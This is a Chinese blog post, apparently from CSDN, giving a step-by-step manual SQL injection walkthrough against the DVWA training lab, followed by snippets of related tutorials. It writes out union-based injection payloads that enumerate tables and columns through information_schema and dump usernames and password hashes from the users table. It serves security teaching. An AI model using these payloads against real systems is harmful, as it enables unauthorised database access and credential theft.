DVWA 之 SQL 注入

已于 2024-10-02 23:46:03 修改
阅读量761 收藏 12
点赞数 5
CC 4.0 BY-SA版权
文章标签: 数据库 dba mysql
于 2024-10-02 23:45:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hacker_feng/article/details/142681283

SQL注入

步骤:
1.判断是否存在注入,注入是字符型还是数字型
2.猜解SQL查询语句中的字段数
3.确定显示的字段顺序
4.获取当前数据库
5.获取数据库中的表
6.获取表中的字段名
7.下载数据

1.判断是否存在注入,注入是字符型还是数字型

输入:   1   //查询成功:

输入: 1' and '1'='2   //查询失败,返回结果为空:

输入:  1' or '1'='1  // 查询成功:

返回多个结果,说明存在字符型注入 ;

2.猜解SQL查询语句中的字段数

输入:   1' or 1=1 order by 1#    //查询成功:

输入 :  1' or 1=1 order by 2#    //  查询成功:

输入 1' or 1=1 order by 3#  //  查询失败:

说明执行的SQL查询语句中只有两个字段,即这里的First name、Surname。
这里也可以通过输入union select 1,2,3…来猜解字段数)

输入:1' union select 1#

输入:1' union select 1,2#

3.确定回显的字段的位置

输入:   1′ union select 1,10#   //  查询成功:

说明回显位为 ‘2’ ;

4.获取当前数据库

输入:   1′ union select 1,database() #   //    查询成功

 说明当前的数据库为dvwa  ;

5.获取数据库中的表

输入:   1' or 1=2 union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()# // 查询当前数据库dvwa 中的表

说明数据库dvwa中一共有两个表  guestbook  与   users  ;

6.获取表中的字段名

输入:  1' or 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#     //    查询成功:

说明users表中有8个字段,分别是
user_id
first_name
last_name
user
password
avatar
last_login
failed_login;

7.下载数据

输入: 1' or 1=2 union select 1,group_concat(user_id,';',user,';',password) from users#      //  查询成功    group_concat(  括号中为表中字段名  )  from 表   ;

DVWA——SQL注入
m0_74426634的博客
04-07 1536
日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了不可收拾的恶果,验证了一句话“出来混的,迟早是要还的”,所以介绍一些常用的攻击技术和防范策略。SQL Injection也许很多人都知道或者使用过,如果没有了解或完全没有听过也没有关系,因为接下来我们将介绍SQL Inj
DVWASQL注入
geejkse_seff的博客
07-30 443
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
DVWA靶场保姆级通关教程--07SQL注入(上)
最新发布
m0_74020575的博客
05-09 1661
SQL注入SQL Injection)是一种常见的Web安全漏洞攻击方式,攻击者通过在输入中注入恶意SQL语句,欺骗应用程序执行非预期的数据库操作,从而窃取、修改、删除数据库中的数据,甚至控制服务器。
DVWA-SQL注入
acdcccc的博客
08-26 383
分享DVWA靶场的SQL注入过程
dvwa——sql注入
GZY0601的博客
09-16 759
Hello!转眼一看距离我上次发文章都是一年前的事情了,中职的第三年都一直备赛的路上,一次比了三个项目,搞得学的好乱,现在上了大学,开始回来复习安全的东西,说实话好久没练了很多基本的东西都忘记了,去年就一直说要写dvwa的教程,现在刚好算是可以边复习边更新。哈哈哈哈哈哈!SQL注入是一种常见的网络安全漏洞和攻击方式,它利用应用程序对用户输入数据的处理不当,使得攻击者能够在执行SQL查询时插入恶意的SQL代码。通过成功注入恶意代码,攻击者可以执行未经授权的数据库操作,获取敏感信息、篡改数据甚至完全破坏数据库
DVWA通过攻略之SQL注入_dvwa sql注入
2401_84968371的博客
05-12 1913
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。
DVWASQL注入详解(包含知识点)
10-20
DVWA(Damn Vulnerable Web Application)的SQL注入(low)级别中,可以学习到多个关于SQL注入的知识点。例如,了解了SQL语句中的"ORDER BY"子句,它用于对查询结果进行排序。"ORDER BY 1"意味着按照第一个字段...
DVWA下的SQL注入
07-25
SQL
DVWASQL注入(盲注)
天空之蓝的博客
11-17 4601
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
dvwasql注入
BAIXUAN9527的博客
03-27 597
SQL i 攻击者在web表单或者页面请求的查询字符串中通过查询的字符串恶意的注入SQl命令,从而使数据库执行恶意的SQl语句 1验证web存在SQL漏洞 2寻找注入点 2.1web页面某个表单的输入框里 2.2web页面的URL查询(带参数的URl) 3构造攻击的SQL语句 4通过注入点提交构造的攻击语句,构造的SQL数据库执行 5通过web页面返回数据,提取分析我们想要的数据信息 注入点类...
DVWASQL Injection
谢公子的博客
08-05 7293
SQL Injection SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。近期很火的大使馆接连被黑事件,据说黑客依靠的就是常见的SQL注入漏洞。 手工注入思路 自动化的注入神器sqlmap...
DVWA靶场中SQL注入
剁椒鱼头没剁椒的博客
12-13 7588
但输入-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=“users”#的时候在2号位显示出很多的列,我们就看其中的user和password。4)联合查询判断可显示的注入点,当输入-1’ union select 1,2# 就能够显示1和2在的位置。2)输入1 and 1=2#正常,但是当输入1’ and 1=2#不正常,那么证明可以判断为字符型注入
DVWA-------简单的SQL注入
热门推荐
weixin_53139899的博客
04-17 1万+
DVWA-----SQL注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 二、实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终 爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 判断是否存在SQL注入
dvwasql注入(低级)
12-21
DVWA(Damn Vulnerable Web Application)是一个用于学习和测试Web应用程序安全的漏洞测试平台。其中包含了不同级别的漏洞,包括SQL注入SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在输入字段中插入恶意的SQL代码来执行未经授权的数据库操作。 在DVWA中进行SQL注入(低级)的操作如下: 1. 打开DVWA平台并登录。 2. 在左侧导航栏中选择"SQL Injection"。 3. 在"SQL Injection"页面中,选择"Low"级别。 4. 在页面上方的输入框中输入一个单引号(')并点击"Submit"按钮。 5. 页面将显示一个错误消息,表明存在SQL注入漏洞。 6. 在输入框中输入以下内容并点击"Submit"按钮: ``` 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# ``` 这个语句将获取当前数据库中所有表的名称。 7. 页面将显示一个包含表名的结果集。 通过以上步骤,你可以在DVWA平台上进行SQL注入(低级)的操作,并获取数据库中的表名。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值